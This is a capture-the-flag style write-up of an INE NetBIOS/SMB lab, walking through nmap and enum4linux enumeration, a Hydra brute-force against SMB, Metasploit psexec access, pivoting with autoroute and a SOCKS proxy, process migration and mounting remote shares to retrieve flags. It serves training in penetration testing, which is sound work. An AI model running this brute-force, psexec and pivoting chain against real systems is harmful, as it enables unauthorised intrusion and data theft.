0xMat10
14 min readApr 25, 2023

NetBIOS Hacking

Welcome !

Welcome N1NJ10 in new writeup from Netbios Hacking lab

we will learn to enumerate the SMB service and exploit it using different brute-forcing and exploitation tools. Also, it covers pivoting and how to leverage net utility to mount the shared drives in the pivot network.

Lab Environment

In this lab environment, the user will access a Kali GUI instance. A vulnerable SMB service can be accessed using the tools installed on Kali on http://demo.ineee.local and http://demo1.ineee.local

Objective: Exploit both the target and find the flag!

Tools

The best tools for this lab are:

  • Metasploit Framework
  • Nmap
  • Hydra
  • Proxychains

If you don’t know what is Netbios , I advise you to read this article to understand what is Netbios and How do we deal with this protocol

Let’s start

AS we see we have 2 targets http://demo.ine.local and http://demo1.ine.local can we reach them or not

footprinting ~

Well we can reach one http://demo.ine.local and only solve the IP address to the other one http://demo1.ine.local

Let’s focus on the first one that we can reach

Nmap is a good way to start

nmap -Pn -p- -T4 --disable-arp-ping -n -sV -sT 10.5.25.62
Nmap result

We can see that 139,445 ports are open , Good news now we know that this machine run Netbios , SMB

Let’s enumerate Netbios credentials with enum4linux

enum4linux -a demo.ine.local 

we can see the following result :

root@INE:~# enum4linux -a demo.ine.local 
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Apr 23 01:41:48 2023

==========================
| Target Information |
==========================
Target ........... demo.ine.local
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


======================================================
| Enumerating Workgroup/Domain on demo.ine.local |
======================================================
[E] Can't find workgroup/domain


==============================================
| Nbtstat Information for demo.ine.local |
==============================================
Looking up status of 10.5.25.62
No reply from 10.5.25.62

=======================================
| Session Check on demo.ine.local |
=======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server demo.ine.local allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

=============================================
| Getting domain SID for demo.ine.local |
=============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
result was NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup

========================================
| OS information on demo.ine.local |
========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for demo.ine.local from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for demo.ine.local from srvinfo:
DEMO.INE.LOCAL Wk Sv NT SNT
platform_id : 500
os version : 6.3
server type : 0x9003

===============================
| Users on demo.ine.local |
===============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x1 RID: 0x3f1 acb: 0x00000210 Account: admin Name: (null) Desc: (null)
index: 0x2 RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x3 RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x4 RID: 0x3f2 acb: 0x00000210 Account: root Name: (null) Desc: (null)

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[admin] rid:[0x3f1]
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[root] rid:[0x3f2]

===========================================
| Share Enumeration on demo.ine.local |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
do_connect: Connection to demo.ine.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
Downloads Disk
IPC$ IPC Remote IPC
print$ Disk Printer Drivers
Public Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available


[+] Attempting to map shares on demo.ine.local
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/ADMIN$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/C$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/Documents Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/Downloads Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/IPC$ Mapping: OK Listing: DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/print$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/Public Mapping: DENIED, Listing: N/A

======================================================
| Password Policy Information for demo.ine.local |
======================================================


[+] Attaching to demo.ine.local using a NULL share

[+] Trying protocol 139/SMB...

[!] Protocol failed: Cannot request session (Called Name:DEMO.INE.LOCAL)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] ATTACKDEFENSE
[+] Builtin

[+] Password Info for Domain: ATTACKDEFENSE

[+] Minimum password length: None
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


================================
| Groups on demo.ine.local |
================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin groups:
group:[Access Control Assistance Operators] rid:[0x243]
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[Cryptographic Operators] rid:[0x239]
group:[Distributed COM Users] rid:[0x232]
group:[Event Log Readers] rid:[0x23d]
group:[Guests] rid:[0x222]
group:[Hyper-V Administrators] rid:[0x242]
group:[IIS_IUSRS] rid:[0x238]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Log Users] rid:[0x22f]
group:[Performance Monitor Users] rid:[0x22e]
group:[Power Users] rid:[0x223]
group:[Print Operators] rid:[0x226]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[Remote Desktop Users] rid:[0x22b]
group:[Remote Management Users] rid:[0x244]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]

[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Performance Log Users' (RID: 559) has member: Could not connect to server 10.5.25.62
Group 'Performance Log Users' (RID: 559) has member: The username or password was not correct.
Group 'Performance Log Users' (RID: 559) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Event Log Readers' (RID: 573) has member: Could not connect to server 10.5.25.62
Group 'Event Log Readers' (RID: 573) has member: The username or password was not correct.
Group 'Event Log Readers' (RID: 573) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Access Control Assistance Operators' (RID: 579) has member: Could not connect to server 10.5.25.62
Group 'Access Control Assistance Operators' (RID: 579) has member: The username or password was not correct.
Group 'Access Control Assistance Operators' (RID: 579) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Replicator' (RID: 552) has member: Could not connect to server 10.5.25.62
Group 'Replicator' (RID: 552) has member: The username or password was not correct.
Group 'Replicator' (RID: 552) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Backup Operators' (RID: 551) has member: Could not connect to server 10.5.25.62
Group 'Backup Operators' (RID: 551) has member: The username or password was not correct.
Group 'Backup Operators' (RID: 551) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'RDS Remote Access Servers' (RID: 575) has member: Could not connect to server 10.5.25.62
Group 'RDS Remote Access Servers' (RID: 575) has member: The username or password was not correct.
Group 'RDS Remote Access Servers' (RID: 575) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Network Configuration Operators' (RID: 556) has member: Could not connect to server 10.5.25.62
Group 'Network Configuration Operators' (RID: 556) has member: The username or password was not correct.
Group 'Network Configuration Operators' (RID: 556) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Power Users' (RID: 547) has member: Could not connect to server 10.5.25.62
Group 'Power Users' (RID: 547) has member: The username or password was not correct.
Group 'Power Users' (RID: 547) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Hyper-V Administrators' (RID: 578) has member: Could not connect to server 10.5.25.62
Group 'Hyper-V Administrators' (RID: 578) has member: The username or password was not correct.
Group 'Hyper-V Administrators' (RID: 578) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Users' (RID: 545) has member: Could not connect to server 10.5.25.62
Group 'Users' (RID: 545) has member: The username or password was not correct.
Group 'Users' (RID: 545) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'IIS_IUSRS' (RID: 568) has member: Could not connect to server 10.5.25.62
Group 'IIS_IUSRS' (RID: 568) has member: The username or password was not correct.
Group 'IIS_IUSRS' (RID: 568) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Remote Desktop Users' (RID: 555) has member: Could not connect to server 10.5.25.62
Group 'Remote Desktop Users' (RID: 555) has member: The username or password was not correct.
Group 'Remote Desktop Users' (RID: 555) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'RDS Endpoint Servers' (RID: 576) has member: Could not connect to server 10.5.25.62
Group 'RDS Endpoint Servers' (RID: 576) has member: The username or password was not correct.
Group 'RDS Endpoint Servers' (RID: 576) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Guests' (RID: 546) has member: Could not connect to server 10.5.25.62
Group 'Guests' (RID: 546) has member: The username or password was not correct.
Group 'Guests' (RID: 546) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'RDS Management Servers' (RID: 577) has member: Could not connect to server 10.5.25.62
Group 'RDS Management Servers' (RID: 577) has member: The username or password was not correct.
Group 'RDS Management Servers' (RID: 577) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Distributed COM Users' (RID: 562) has member: Could not connect to server 10.5.25.62
Group 'Distributed COM Users' (RID: 562) has member: The username or password was not correct.
Group 'Distributed COM Users' (RID: 562) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Cryptographic Operators' (RID: 569) has member: Could not connect to server 10.5.25.62
Group 'Cryptographic Operators' (RID: 569) has member: The username or password was not correct.
Group 'Cryptographic Operators' (RID: 569) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Certificate Service DCOM Access' (RID: 574) has member: Could not connect to server 10.5.25.62
Group 'Certificate Service DCOM Access' (RID: 574) has member: The username or password was not correct.
Group 'Certificate Service DCOM Access' (RID: 574) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Print Operators' (RID: 550) has member: Could not connect to server 10.5.25.62
Group 'Print Operators' (RID: 550) has member: The username or password was not correct.
Group 'Print Operators' (RID: 550) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Administrators' (RID: 544) has member: Could not connect to server 10.5.25.62
Group 'Administrators' (RID: 544) has member: The username or password was not correct.
Group 'Administrators' (RID: 544) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Remote Management Users' (RID: 580) has member: Could not connect to server 10.5.25.62
Group 'Remote Management Users' (RID: 580) has member: The username or password was not correct.
Group 'Remote Management Users' (RID: 580) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Performance Monitor Users' (RID: 558) has member: Could not connect to server 10.5.25.62
Group 'Performance Monitor Users' (RID: 558) has member: The username or password was not correct.
Group 'Performance Monitor Users' (RID: 558) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting local groups:
group:[WinRMRemoteWMIUsers__] rid:[0x3e8]

[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'WinRMRemoteWMIUsers__' (RID: 1000) has member: Could not connect to server 10.5.25.62
Group 'WinRMRemoteWMIUsers__' (RID: 1000) has member: The username or password was not correct.
Group 'WinRMRemoteWMIUsers__' (RID: 1000) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.

[+] Getting domain groups:
group:[None] rid:[0x201]

[+] Getting domain group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'None' (RID: 513) has member: Could not connect to server 10.5.25.62
Group 'None' (RID: 513) has member: The username or password was not correct.
Group 'None' (RID: 513) has member: Connection failed: NT_STATUS_LOGON_FAILURE

=========================================================================
| Users on demo.ine.local via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742.

===============================================
| Getting printer info for demo.ine.local |
===============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Sun Apr 23 01:42:11 2023

root@INE:~#

From the previous result we can see we have users [ Administrator , Guest , Root , Admin ] we may have null session here cuz we can login with no credentials and have IPC$ dir

Note : if you don’t know what is null session and what is IPC$ look here for more detailed

Let’s test this with smbclient tool

smbclient -L 10.5.30.121 < demo.ine.local >

Note : the machine crashed many times so the IP may change in some command also

smbclient_result ~

Pingo we have null session in there we only need a valid credantials to use psexec exploit to get C2 over the machine

So we have usernames from enum4linux we can brute force with them , you can use NSE from Nmap or any other method but i prefer hydra for this tasks

hydra -L Users.txt -p < ANY_PASSWORD_LIST > smb://demo.ine.local
hydra_result ~

Pingo , we now have the administrator account

Now we can run psexec module

set_options ~

Give it a run !!

Pingo ~~

Pingo , Now we are in !!

But we not end until now , We just start in the second task

we can’t access demo1.ine.local from our machine , Let’s see if we can access it from this victim machine

demo1.ine.local or it’s IP

Note : we can’t ping with the name cuz this machine disable resolve with DNS so i know the IP from the first ping i do in the above

So this machine have another NIC with private IP lan we can’t access let’s see with ipconfig

ipconfig
eth0

eth0 ( Interface 12 ) is the NIC we wanna to access so we can add this route with autoroute module from metasploit

run autoruote -s 10.5.27.211/20

Note : why i use /20 prefix cuz the netmask is 255.255.240.0 for mor info here

autoroute_result

Now we add access this network from metasploit only but i want to access it from my normal terminal

So i used SOCKS_PROXY server module from metasploit

Note : You must know what is your default socks proxychanins tor port , you can know it with this command

tail -n 5 ../../etc/proxychains4.conf

9050 is our defult port

Now we ready to start the SOCKS_PROXY server module

server_is_runnig

Good now we can do whatever we want from our machine to the deme1.ine.local throw the proxy server

Let’s scan it

proxychains nmap -sT -Pn -sV --disable-arp-ping -T4 -n demo1.ine.local

It have 445 port open will that mean it have Netbios too

Now this is the time to grep our flags

I start search for the first flag in the first vicitm machine ( demo.ine.local ) i found it in Documents dir

Flag_1

Let’s see what is in the secound one with net view command

net view 10.5.27.211
what !!!

We have received the Access is denied however we are the root this means we probably should migrate

So i decided to migrate to explorer.exe operation

Note : if you don’t know what is Migrate process or why i choose explorer.exe or what is it read this

migrate -N explorer.exe 
migratatetatetate

Let’s see if we can use net view

Pingo

We can use net view commad , Now we have Documents , K dir , let’s see what disks exist in this machine with

diskpart
list disk
disk 0

Ok we have one disk with the naem Disk0 we can get the 2 dir’s from the Netbios

net use dir_name : \\<IP>\\dir_you_want_to_download
we get them ~~

Now we have them , I found the secound flag in D dir ( Documents )

Pingo

I enjoyed the lab , and would post more future labs and other security stuff in the future.

0xMat10

Maybe it's vulnerable maybe it's rude Gotta devil in your memory It's shellcode Executing My gadget gonna ROP Reaching out the 0xFFFFFFFF Got your kernel mode